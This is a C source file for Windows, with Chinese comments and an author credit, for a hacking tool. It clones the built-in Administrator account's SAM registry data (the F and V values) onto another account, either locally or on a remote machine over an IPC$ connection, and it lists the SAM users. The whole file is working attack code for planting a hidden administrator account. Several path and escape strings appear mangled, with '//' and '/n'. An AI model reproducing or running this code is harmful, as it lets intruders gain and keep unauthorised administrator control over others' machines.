#define DEBUGMSG
#include <windows.h>
#include <winnetwk.h>
#include <tchar.h>
#include <stdio.h>
#pragma comment(lib,"mpr.lib")
#define Debug(x) OutputDebugString(TEXT(x))
#define erron GetLastError()
#define ALLOCBUFFER (1024*10)
#define REMOTE_HOST_LEN 20
#define SET_CONNECT_IPC 0 //使用IPC
#define NOT_CONNECT_IPC 1 //不使用
typedef struct ipcinfo
{
TCHAR RemoteIP[REMOTE_HOST_LEN]; //远程IP
TCHAR RemoteUser[REMOTE_HOST_LEN]; //用户名
TCHAR RemotePass[REMOTE_HOST_LEN]; //密码
UINT IsIPC:1; //是否使用IPC
}IPCINFO,*PIPCINFO,*LPIPCINFO;
TCHAR ipc[100]={0};
TCHAR name[50][100]={0};
DWORD KeyN=0;
//克隆帐户
BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo);
BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey); //打开子键
BOOL ViewUser (IN TCHAR *ViewKey); //枚举注册表用户信息
BOOL ListUser (IN LPIPCINFO lpIpcInfo); //列出注册表用户信息
BOOL ConnIPC (IN LPIPCINFO lpIpcInfo); //IPC连接
//错误处理
inline void MessageError (TCHAR *FuncName,DWORD ErrorId,BOOL MsgFlag)
{
TCHAR *Message=NULL;
TCHAR MsgError[MAX_PATH]={0};
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,
ErrorId,MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),(TCHAR *)&Message,0,NULL);
if (MsgFlag)
_ftprintf(stderr,TEXT("%s GetLastError reports %d and %s/n"),FuncName,ErrorId,Message);
if (!MsgFlag)
{
_stprintf(MsgError,TEXT("%s GetLastError reports %d and %s/n"),FuncName,ErrorId,Message);
Debug(MsgError);
}
if (Message)
LocalFree(Message);
}
BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo)
{
HKEY ConnhKey=NULL,hKey=NULL,ClonehKey=NULL;
LPBYTE lpDataF=NULL,lpDataV=NULL;
TCHAR CloneSid[100]={0},MachineName[20]={0};
DWORD lpSizeF=ALLOCBUFFER,lpSizeV=ALLOCBUFFER;
DWORD RegType=REG_BINARY;
BOOL Flag=FALSE;
__try
{
if (lpIpcInfo->IsIPC==SET_CONNECT_IPC) //进程IPC连接
{
_tprintf(TEXT("Connect remote registry....../n"));
if (!(ConnIPC(lpIpcInfo)))
{
Flag=TRUE;
__leave;
}
_tcscpy(MachineName,TEXT(""));
_tcscat(MachineName,lpIpcInfo->RemoteIP);
//连接远程注册表
if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegConnectRegistry()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
}
else
{
ConnhKey=HKEY_LOCAL_MACHINE;
}
lpDataF=(LPBYTE) malloc (ALLOCBUFFER);
lpDataV=(LPBYTE) malloc (ALLOCBUFFER);
if (lpDataF==NULL || lpDataV==NULL)
{
#ifdef DEBUGMSG
MessageError("malloc()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
_tcscpy(CloneSid,TEXT("SAM//SAM//Domains//Account//Users//00000"));
_tcscat(CloneSid,CloneUser);
//打开Aministrator
if (RegOpenKeyEx(ConnhKey,TEXT("SAM//SAM//Domains//Account//Users//000001F4"),0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
//获取F信息
if(RegQueryValueEx(hKey,TEXT("F"),NULL,&RegType,lpDataF,&lpSizeF)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegQueryValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
//获取V信息
if(RegQueryValueEx(hKey,TEXT("V"),NULL,&RegType,lpDataV,&lpSizeV)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegQueryValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;;
}
//打开需要克隆的帐户
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,CloneSid,0,KEY_ALL_ACCESS,&ClonehKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
//设置F
if (RegSetValueEx(ClonehKey,TEXT("F"),0,REG_BINARY,lpDataF,lpSizeF)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegSetValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
//设置V
if (RegSetValueEx(ClonehKey,TEXT("V"),0,REG_BINARY,lpDataV,lpSizeV)==ERROR_SUCCESS)
{
_tprintf(TEXT("Clone User Success/n"));
}
else
{
#ifdef DEBUGMSG
MessageError("RegSetValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
}
__finally
{
if (lpDataF)
free(lpDataF);
if (lpDataV)
free(lpDataV);
if (hKey)
RegCloseKey(hKey);
if (ClonehKey)
RegCloseKey(ClonehKey);
}
if (Flag)
return FALSE;
else
return TRUE;
}
BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey)
{
HKEY hKey=NULL;
TCHAR TempName[100]={0},BufferName[100]={0};
DWORD TempSize=100,ret=0;
if (RegOpenKeyEx(ConnhKey,OpenKey,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
return FALSE;
}
for (DWORD i=0,Index=0; ret==ERROR_SUCCESS; i++,Index++,KeyN++)
{
//枚举用户
ret=RegEnumKeyEx(hKey,Index,TempName,&TempSize,NULL,NULL,NULL,NULL);
_tcscat(name,TempName);
memset(TempName,0,sizeof (TempName));
TempSize=sizeof (TempName);
Sleep(50);
}
if (hKey)
RegCloseKey(hKey);
return TRUE;
}
BOOL ViewUser (IN TCHAR *ViewKey)
{
HKEY hKey=NULL;
DWORD RegType=0;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,ViewKey,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
return FALSE;
}
if (RegQueryValueEx(hKey,NULL,NULL,&RegType,NULL,NULL)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
RegCloseKey(hKey);
return FALSE;
}
_tprintf(TEXT(" %X/n"),RegType);
if (hKey)
RegCloseKey(hKey);
return TRUE;
}
BOOL ListUser (IN LPIPCINFO lpIpcInfo)
{
HKEY ConnhKey=NULL;
TCHAR MachineName[20]={0};
TCHAR RegTemp[50]={0};
TCHAR RegBuffer[100]={TEXT("SAM//SAM//Domains//Account//Users//Names//")};
DWORD ret=0;
if (lpIpcInfo->IsIPC==SET_CONNECT_IPC)
{
_tprintf(TEXT("Connect remote registry....../n"));
if (!(ConnIPC(lpIpcInfo)))
return FALSE;
_tcscpy(MachineName,TEXT(""));
_tcscat(MachineName,lpIpcInfo->RemoteIP);
if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegConnectRegistry()",erron,TRUE);
#endif
return FALSE;
}
}
else
{
ConnhKey=HKEY_LOCAL_MACHINE;
}
if (!(OpenKey(TEXT("SAM//SAM//Domains//Account//Users//Names"),ConnhKey)))
return FALSE;
for (DWORD n=0; n<KeyN-1; n++)
{
_tcscat(RegBuffer,name[n]);
wsprintf(RegTemp,name[n]);
_tcscat(RegTemp,TEXT(" ===>"));
_tprintf(TEXT("%s"),RegTemp);
if (!(ViewUser(RegBuffer)))
return FALSE;
_tcscpy(RegBuffer,TEXT("SAM//SAM//Domains//Account//Users//Names//"));
Sleep(10);
}
return TRUE;
}
BOOL ConnIPC (IN LPIPCINFO lpIpcInfo)
{
NETRESOURCE nr;
_sntprintf(ipc,sizeof (ipc)-1,TEXT("%s//ipc$"),lpIpcInfo->RemoteIP);
nr.lpLocalName=NULL;
nr.lpProvider=NULL;
nr.dwType=RESOURCETYPE_ANY;
nr.lpRemoteName=ipc;
if (WNetAddConnection2(&nr,lpIpcInfo->RemotePass,lpIpcInfo->RemoteUser,0))
{
#ifdef DEBUGMSG
MessageError("WNetAddConnection2()",erron,TRUE);
#endif
return FALSE;
}
return TRUE;
}
int main (int argc,TCHAR *argv[])
{
IPCINFO IpcInfo={0};
if (argc==1)
{
_tprintf(TEXT("Code by dahubaobao/n"));
return 0;
}
if (argc==3) //本地克隆
{
if (_tcsicmp(argv[1],TEXT("-c"))==0)
{
if (_tcslen(argv[2])>5)
{
_tprintf(TEXT("User sid no larger than /"5/"/n"));
return 0;
}
IpcInfo.IsIPC=NOT_CONNECT_IPC; //不使用IPC连接
if (!(CloneUser(argv[2],&IpcInfo)))
return 0;
}
}
if (argc==6) //远程克隆
{
if (_tcsicmp(argv[1],TEXT("-c"))==0)
{
if (_tcslen(argv[2])>5)
{
_tprintf(TEXT("User sid no larger than /"5/"/n"));
return 0;
}
IpcInfo.IsIPC=SET_CONNECT_IPC; //使用IPC
_tcsncpy(IpcInfo.RemoteIP,argv[3],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemoteUser,argv[4],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemotePass,argv[5],REMOTE_HOST_LEN-1);
if (!(CloneUser(argv[2],&IpcInfo)))
return 0;
}
}
if (argc==2) //列出本地用户
{
if (_tcsicmp(argv[1],TEXT("-l"))==0)
{
IpcInfo.IsIPC=NOT_CONNECT_IPC;
if (!(ListUser(&IpcInfo)))
return 0;
}
}
if (argc==5) //列出远程用户
{
if (_tcsicmp(argv[1],TEXT("-l"))==0)
{
IpcInfo.IsIPC=SET_CONNECT_IPC;
_tcsncpy(IpcInfo.RemoteIP,argv[2],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemoteUser,argv[3],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemotePass,argv[4],REMOTE_HOST_LEN-1);
if (!(ListUser(&IpcInfo)))
return 0;
}
}
if (IpcInfo.IsIPC==SET_CONNECT_IPC)
{
if (WNetCancelConnection2(ipc,0,TRUE)) //断开IPC
{
#ifdef DEBUGMSG
MessageError("WNetCancelConnection2()",erron,TRUE);
#endif
return 0;
}
}
return 0;
}
来源:dahu_baobao